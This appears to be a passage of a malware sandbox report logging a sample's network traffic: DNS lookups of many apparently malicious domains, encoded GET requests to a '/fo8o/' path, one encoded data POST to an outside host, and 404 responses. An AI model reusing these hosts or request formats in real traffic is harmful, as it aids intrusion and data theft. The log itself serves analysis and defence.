Source: global traffic	HTTP traffic detected: GET /fo8o/?DZb=zf440xcx6XAL&6d6p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?6d6p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&DZb=zf440xcx6XAL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 217Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 36 64 36 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4e 57 2b 6c 36 56 44 69 55 6a 66 53 54 6e 4d 45 48 39 5a 54 68 7a 67 4d 46 49 64 59 4a 36 43 4f 55 34 77 31 69 59 36 39 45 41 43 78 71 63 36 6e 51 3d 3d Data Ascii: 6d6p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfONW+l6VDiUjfSTnMEH9ZThzgMFIdYJ6COU4w1iY69EACxqc6nQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 08:26:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 13 Jan 2025 08:27:06 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 13 Jan 2025 08:27:08 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 13 Jan 2025 08:27:11 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 13 Jan 2025 08:27:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:10 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:29:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
